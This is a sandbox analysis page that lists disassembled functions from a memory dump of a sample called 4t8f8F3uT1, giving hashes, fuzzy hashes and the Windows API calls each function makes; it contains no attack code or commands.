Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 4b1d215cdd80a9041cbf9f0f3e8824b80b5fce3f07245a3000915f3962feb8f0
Instruction ID: 5fd2efdfbc6dac4f106a09dedb1b5fb1e4dcc1c5e450b08fb37a40c06b996e53
Opcode Fuzzy Hash: 4b1d215cdd80a9041cbf9f0f3e8824b80b5fce3f07245a3000915f3962feb8f0
Instruction Fuzzy Hash: DBB129316106099FD715CF28C48ABA57BE1FF46364F25865DE899CF2A2C339ED92CB40

Function 006AF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006AF66A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 518772564492858b857e44a185e8209776ce77444f8a621bd59d8c39f2a8211c
Instruction ID: 0654a8fe5b25b2e60af1cbf5cb8f2601c8e6b60fa346d9715921bea8f7d62586
Opcode Fuzzy Hash: 518772564492858b857e44a185e8209776ce77444f8a621bd59d8c39f2a8211c
Instruction Fuzzy Hash: F2517BB19006198FEB24CF94E8856AABBF2FB49344F24946AD411EB350D376DD00CF61

Function 0069B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0069B16B

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: c37fb3c0877ddb20da05856dea86ce833c37ab2259a3f74c44380c90ed31530a
Instruction ID: 49f620083b3818b720ac6a1c651da3f757810987c67b19bd88a2057c334e7613
Opcode Fuzzy Hash: c37fb3c0877ddb20da05856dea86ce833c37ab2259a3f74c44380c90ed31530a
Instruction Fuzzy Hash: 45F05EB4E002189FDB18DB18FD96AE973F7FB99315F105296D51593390C7B0AD84CEA0

Function 006940FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 006941BC

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 790ebb18598587a303fc53bd3f0d1954f6620659a7e6a32de521bd14aa5c92b7
Instruction ID: d22059ca204851dc933d799b4b6d8c34c1ce08cf518f7680c93a58a24d85191b
Opcode Fuzzy Hash: 790ebb18598587a303fc53bd3f0d1954f6620659a7e6a32de521bd14aa5c92b7
Instruction Fuzzy Hash: DBC15972A183518FC754CF29D880A5AFBE2BFC9308F19892DE998D7311D734E905CB92

Function 006AF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,006AF3A5), ref: 006AF9DA

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ecb7e371184361fe77a1b087d514b4e3a19314d59deb8ebc1018c65a0838a01b
Instruction ID: ef86504a93208eee0436d21f4297b8bde76f0fb8056142ae4d9c173abffe7022
Opcode Fuzzy Hash: ecb7e371184361fe77a1b087d514b4e3a19314d59deb8ebc1018c65a0838a01b
Instruction Fuzzy Hash:

Function 006BC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 006BC030

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 04348ff1db26e095680634fa60eb6dfa24c1e8378732f8f6538d8c1e7446045f
Instruction ID: 482036c3e1a8cf8fc8b241afb3cc37749b0c484cb9fa742be27d70bea8800d73
Opcode Fuzzy Hash: 04348ff1db26e095680634fa60eb6dfa24c1e8378732f8f6538d8c1e7446045f
Instruction Fuzzy Hash: 19A011302022028F83008F30AE08A283AAAAA00280308A02AA008C0220EA2080A0AA00

Function 006A62CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: c7aae7eb72d08e114ec05a89aebb03956e833ed7f9f99d066ad4b8b2b3ec92cf
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: 3262C4716047859FCB25DF28C4906B9BBE2AF96304F08896DE8EA8B346D734ED45CF11

Function 006A77EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: 57110e07e354dae56cbb3bea06b993cb50a36c2fa9fa087f519c4edd01a6ff24
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: AD62D7716083458FCB15DF28C8905B9BBE2BF96304F1889ADE89A8B346D730ED45CF55

Function 0069F461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: 1e7dcbd17939864963837dc989c10cc0a0501c0b8acb5a3846d38d41dca2470a
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: 9D525A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5859B255D334EA19CB86

Function 006A7153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d787c2c9fdf8f5bfeeaf7b24531b269f7df8284a3d092a8c758408f89c7ea0b
Instruction ID: 0c23d8576e6e7ee6a2011907921fad72d5e998e37c8f983bf862ba41d915bbb4
Opcode Fuzzy Hash: 7d787c2c9fdf8f5bfeeaf7b24531b269f7df8284a3d092a8c758408f89c7ea0b
Instruction Fuzzy Hash: 0F12B0B16087068FC718DF28C890AB9B7E2FB95304F14892EE996C7781D734E995CB45

Function 0069C426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec4c1545c5aff716b8a91a1653cd47c2b2936dab25220392f3a0c9c64e41d421
Instruction ID: b7ecff3aee2caaa95e2b25fc35cc22a0ea7e22ca33ceeb6c5fcce85f38ae4dcb
Opcode Fuzzy Hash: ec4c1545c5aff716b8a91a1653cd47c2b2936dab25220392f3a0c9c64e41d421
Instruction Fuzzy Hash: 84F1AE716083018FCB58CF28C58466ABBEAEFC9324F154A2EF4C5DBB51D630E945CB56

Function 006A6CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7289799865703633b221b683e2db3d2e2a94a94746a31e20863bc673615b60eb
Instruction ID: be7d36d9d3a937a10c29ef10967fe9889fd0253bcb3096cd8536714fe922ffa3
Opcode Fuzzy Hash: 7289799865703633b221b683e2db3d2e2a94a94746a31e20863bc673615b60eb
Instruction Fuzzy Hash: F7D15FB16083458FDB14EF28C84479ABBE2AF8A308F08456DF8859B342D774ED45CB5A

Function 0069E9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac440e23c1f140676384f198d677b4f3db918a6131915868007d93b2492e8e31
Instruction ID: 35b0218dcea905d9c685353f3fcc10d2542c94ba2b6b3908f6ddce8f2540309d
Opcode Fuzzy Hash: ac440e23c1f140676384f198d677b4f3db918a6131915868007d93b2492e8e31
Instruction Fuzzy Hash: 51E15D759093948FC304CF19D89046ABFF2AF9A300F46095EF9D697392C335E919DBA2

Function 006A4088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: bc77226b1f29bade1f8a0a1635ac26629c7548497193086c2417d8b7464b1bf0
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: 309158B02003459BDB24FE64DD91BFA77DBEBD2300F10092CF59687282DEA49D46CB96

Function 006A43BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 54500f80d208c275b75f5a025c86410b2e511bfe0b9348a600afb322a5dc6f2c
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 408128717043464BDB24FE68CDD1BBD37D6EBD6304F00092DE9868B682DEA48D868B56

Function 006B51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d34c5202a2778a92c3dae6be2c7cb9134ca751b3e63e13491404c500bee6f79
Instruction ID: 73af4c556cdee886c663463af7370401fe700de96970c6570b1a8a4edf3a9ec2
Opcode Fuzzy Hash: 5d34c5202a2778a92c3dae6be2c7cb9134ca751b3e63e13491404c500bee6f79
Instruction Fuzzy Hash: BA6177F1610F085ADA789A68A8957FE63D7EF01340F14051EE583DF382E6A2DEC38715

Function 006B4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: 9a5f58e2694c99c6337ece92fb9ea834b1836baa7ccc13189333195c0fcb76f2
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: ED5135E1254F4457DF34696C85A6BFF23CB9B51300F18081AE983CB383CA15EDC683A6

Function 0069EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955380f647eb479cfd481c1ae4075d71acb6ef8076c5a87e474447f6994add6f
Instruction ID: 33f4839e92b02789daf8d28ea6cd3ec5d7455bb5b0be45a3607030da60f1a641
Opcode Fuzzy Hash: 955380f647eb479cfd481c1ae4075d71acb6ef8076c5a87e474447f6994add6f
Instruction Fuzzy Hash: 4451D8315083D54FDB11CF34C5504AEBFFAAE9A314F4A09ADE4D99B643C221DA4ACB92

Function 006A00B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e467d397679478ee423f284bfa7f340cff1109b58a6c42c3719e6d2a59dd604f
Instruction ID: 938c814cdb65af6c536531a3a30146e85ec6942d6878f782a1403f12439e1ee7
Opcode Fuzzy Hash: e467d397679478ee423f284bfa7f340cff1109b58a6c42c3719e6d2a59dd604f
Instruction Fuzzy Hash: 7251DFB1A087119FC748CF19D88055AF7E1FF88314F058A2EE899E3340D735EA59CB9A

Function 006A3E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 734c2ac012acbddcd99ec3bc49fe0090f4a525415e2cfd9b1b4e92fdcdb6fe02
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 663104B1A147568FCB54EF28C8511AABBE1FB96300F10452DE495C7742C735EE0ACF92

Function 0069E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0069E30E

Part of subcall function 00694092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006940A5

Part of subcall function 006A1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,006D1030,00000200,0069D928,00000000,?,00000050,006D1030), ref: 006A1DC4

_strlen.LIBCMT ref: 0069E32F
SetDlgItemTextW.USER32(?,006CE274,?), ref: 0069E38F
GetWindowRect.USER32(?,?), ref: 0069E3C9
GetClientRect.USER32(?,?), ref: 0069E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0069E475
GetWindowRect.USER32(?,?), ref: 0069E4A2
SetWindowTextW.USER32(?,?), ref: 0069E4DB
GetSystemMetrics.USER32(00000008), ref: 0069E4E3
GetWindow.USER32(?,00000005), ref: 0069E4EE
GetWindowRect.USER32(00000000,?), ref: 0069E51B
GetWindow.USER32(00000000,00000002), ref: 0069E58D

Strings

$%s:, xrefs: 0069E302
tl, xrefs: 0069E34A
d, xrefs: 0069E3F5
